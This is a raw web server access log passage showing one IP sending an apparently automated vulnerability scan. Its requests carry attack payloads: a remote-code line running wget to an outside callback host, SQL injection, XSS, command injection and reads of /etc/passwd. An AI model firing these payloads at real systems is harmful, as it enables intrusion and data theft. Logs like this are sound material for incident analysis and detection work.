/page?id=2w9rfVE79pUqgGY2l3lMuuFV7vN&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://d04qr7ij4pq19d75k4901ja9jpwrnwnwp.oast.online%27);s HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15-620" 154.84.62.234 - - [24/Apr/2025:08:37:25 -0400] "GET /dfsms/add-category.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:08:37:28 -0400] "GET /ccms/dashboard.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:37:39 -0400] "POST /wp-admin/admin-ajax.php?action=check_country_selector HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:38:38 -0400] "POST /conf_mail.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:39:03 -0400] "GET /nagiosxi/login.php?redirect=/www.interact.sh HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:08:39:06 -0400] "PUT /v1/agent/check/register HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:08:39:15 -0400] "PUT /v1/agent/check/deregister/2w9rfVyurgqvm2b9gc7eg5m33Bs HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:39:46 -0400] "POST /cgi-bin/login.cgi HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.7.25" 154.84.62.234 - - [24/Apr/2025:08:40:10 -0400] "POST /ztp/cgi-bin/handler HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:08:40:14 -0400] "POST /scgi-bin/platform.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.63" 154.84.62.234 - - [24/Apr/2025:08:40:16 -0400] "POST /app/options.py HTTP/1.1" 403 1242 "https://mgrokokbet.id/app/login.py" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:40:22 -0400] "POST /scgi-bin/platform.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0" 154.84.62.234 - - [24/Apr/2025:08:40:23 -0400] "POST /fileupload/toolsAny HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.8.24" 154.84.62.234 - - [24/Apr/2025:08:40:33 -0400] "GET /authenticationendpoint/2w9rfc6qpacaof1wzxm6o8lfj97.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:40:36 -0400] "GET /pages/csv_export_results_metadata.php?k=zulu&personaldata=0&allavailable=true&submit=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:08:41:17 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0" 154.84.62.234 - - [24/Apr/2025:08:41:21 -0400] "GET /card_scan.php?No=123&ReaderNo=`sleep%207`&CardFormatNo=123 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:42:48 -0400] "GET /pfblockerng/www/index.php HTTP/1.1" 200 0 "-" "-" 154.84.62.234 - - [24/Apr/2025:08:42:54 -0400] "GET /live_check.shtml HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:43:36 -0400] "POST /classes/Master.php?f=delete_request HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:43:49 -0400] "POST /classes/Master.php?f=delete_team HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:44:00 -0400] "POST /classes/Master.php?f=delete_inquiry HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:45:09 -0400] "POST /admin/ajax.php?action=login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:45:16 -0400] "GET /admin/index.php?page=home HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:45:34 -0400] "POST /admin/ajax.php?action=login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.3.26" 154.84.62.234 - - [24/Apr/2025:08:45:41 -0400] "GET /booking.php?car_id=-1%20union%20select%201,md5(999999999),3,4,5,6,7,8,9,10--+ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:45:43 -0400] "POST /hms/doctor/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:46:05 -0400] "POST /admin/ajax.php?action=login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:08:46:09 -0400] "GET /admin/view_car.php?id=-1%20union%20select%201,md5(999999999),3,4,5,6,7,8,9,10--+ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:08:46:11 -0400] "POST /admin/ajax.php?action=login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:46:13 -0400] "POST /login.php HTTP/1.1" 200 0 "\"><script>alert(document.domain)</script><\"" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:08:46:17 -0400] "GET /admin/manage_booking.php?id=-1%20union%20select%201,2,3,4,5,6,md5(999999999),8,9,10,11--+ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_1_4; en-US) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:46:28 -0400] "POST /admin/ajax.php?action=login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:08:46:32 -0400] "GET /admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0" 154.84.62.234 - - [24/Apr/2025:08:46:40 -0400] "GET /cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:08:46:50 -0400] "GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(7)+or+' HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:08:46:54 -0400] "GET /backupsettings.dat HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.4.25" 154.84.62.234 - - [24/Apr/2025:08:47:03 -0400] "GET /sysinit.shtml?r=52300 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/616.21 (KHTML, like Gecko) Version/17.0 Safari/616.21" 154.84.62.234 - - [24/Apr/2025:08:47:11 -0400] "GET /set_safety.shtml?r=52300 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; WebView/3.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362" 154.84.62.234 - - [24/Apr/2025:08:47:25 -0400] "POST /cgi-bin/login.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:47:39 -0400] "POST /templates/default/html/windows/right.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:47:39 -0400] "GET /cgi-bin/ExportLogs.sh HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1" 154.84.62.234 - - [24/Apr/2025:08:48:04 -0400] "GET /ws-api/v2/users/me/details?token=02 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36" 154.84.62.234 - {{username}} [24/Apr/2025:08:48:48 -0400] "GET /delsnap.pl?name=|id HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:08:48:48 -0400] "POST /hms/admin/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0" 154.84.62.234 - - [24/Apr/2025:08:48:57 -0400] "GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:49:03 -0400] "POST /xmlrpc HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:08:50:11 -0400] "GET /wnm/login/login.json HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/616.13.10 (KHTML, like Gecko) Version/17.2.97 Safari/616.13.10" 154.84.62.234 - - [24/Apr/2025:08:50:11 -0400] "POST /webapi/auth HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.2.20" 154.84.62.234 - - [24/Apr/2025:08:51:10 -0400] "POST /mod/lti/auth.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:52:29 -0400] "GET /cgi-bin/popen.cgi?command=cat%20/etc/passwd&v=0.1303033443137912 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:52:29 -0400] "GET /cgi-bin/popen.cgi?command=type%20C://Windows/win.ini&v=0.1303033443137912 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:08:52:29 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:08:52:29 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0" 154.84.62.234 - - [24/Apr/2025:08:52:40 -0400] "POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1\x0920.51" 154.84.62.234 - - [24/Apr/2025:08:52:40 -0400] "POST /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:52:40 -0400] "GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:52:40 -0400] "GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:52:45 -0400] "POST /fw.login.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.8.22" 154.84.62.234 - - [24/Apr/2025:08:53:03 -0400] "GET /login.zul HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:08:53:16 -0400] "GET /rest/api/latest/repos HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:53:37 -0400] "POST /api/v2/open/rowsInfo HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:53:57 -0400] "POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:54:03 -0400] "POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:08:54:09 -0400] "POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:54:33 -0400] "GET //%5coast.me HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:55:18 -0400] "POST /hms/user-login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.5.20" 154.84.62.234 - - [24/Apr/2025:08:55:38 -0400] "POST /js/jquery_file_upload/server/php/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:08:55:46 -0400] "GET /api/subscriber HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/19.0.0 Version/17.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:55:47 -0400] "GET /wp-content/plugins/crm-perks-forms/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_5_3; en-US) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.4 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:55:52 -0400] "GET /wp-content/plugins/crm-perks-forms/templates/sample_file.php?FirstName=<img%20src%20onerror=alert(document.domain)>&LastName=<img%20src%20onerror=alert(document.domain)>&%20Company=<img%20src%20onerror=alert(document.domain)> HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:56:40 -0400] "POST /servlets/OmaDsServlet HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.2.20" 154.84.62.234 - - [24/Apr/2025:08:57:06 -0400] "GET /navpage.do HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_5_7; es) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.7 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:57:07 -0400] "POST /configWizard/keyUpload.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:57:18 -0400] "POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1 20.51" 154.84.62.234 - - [24/Apr/2025:08:57:38 -0400] "POST /ajax/openvpn/del_ovpncfg.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.6.19" 154.84.62.234 - - [24/Apr/2025:08:57:43 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:08:58:04 -0400] "POST /controller/ping.php HTTP/1.1" 200 0 "https://mgrokokbet.id/controller/ping.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:58:13 -0400] "POST /task/loginValidation.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0" 154.84.62.234 - - [24/Apr/2025:08:59:23 -0400] "GET /kfm/index.php/%27%3Cscript%3Ealert%28document.domain%29;%3C/script%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:59:32 -0400] "POST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 154.84.62.234 - - [24/Apr/2025:08:59:55 -0400] "GET /login/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/616.24 (KHTML, like Gecko) Version/17.2 Safari/616.24" 154.84.62.234 - - [24/Apr/2025:09:00:09 -0400] "GET /index.php/user/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:09:00:35 -0400] "GET /pfblockerng/www/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:00:43 -0400] "GET /wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&order[0][column]=0&columns[0][name]=name+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))aaaa)--+- HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:00:47 -0400] "GET /wp-content/plugins/cryptocurrency-widgets-pack/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14092.77.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.107 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:01:05 -0400] "POST /network_test.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:01:04 -0400] "GET /goform/downloadSyslog/syslog.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:09:01:10 -0400] "POST /wp-admin/admin-ajax.php?action=iws_gff_fetch_states HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:01:55 -0400] "GET /api/v2/cmdb/system/admin HTTP/1.1" 200 0 "-" "Node.js" 154.84.62.234 - - [24/Apr/2025:09:02:01 -0400] "PUT /api/v2/cmdb/system/admin/admin HTTP/1.1" 200 0 "-" "Report Runner" 154.84.62.234 - - [24/Apr/2025:09:02:25 -0400] "GET /ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(document.domain)</script> HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:02:30 -0400] "GET /ProcessWait.aspx?POBatch=</script><script>alert(document.domain)</script>&WaitDuration=3 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0" 154.84.62.234 - - [24/Apr/2025:09:02:58 -0400] "GET /index.asp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - admin [24/Apr/2025:09:03:10 -0400] "POST /mgmt/shared/iapp/rpm-spec-creator HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:03:19 -0400] "GET /?q=user/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6" 154.84.62.234 - - [24/Apr/2025:09:03:29 -0400] "GET /?q=user/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0" 154.84.62.234 - - [24/Apr/2025:09:03:31 -0400] "GET /?q=user/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 154.84.62.234 - - [24/Apr/2025:09:06:17 -0400] "GET /wp-admin/admin-ajax.php?action=loginas_return_admin HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:09:06:24 -0400] "GET /wp-admin/users.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:06:42 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:09:07:06 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:09:07:12 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:07:14 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/128.0 (x64 de)" 154.84.62.234 - - [24/Apr/2025:09:07:21 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/617.7 (KHTML, like Gecko) Version/17.3.74 Safari/617.7" 154.84.62.234 - - [24/Apr/2025:09:07:52 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:08:10 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 154.84.62.234 - - [24/Apr/2025:09:08:18 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) 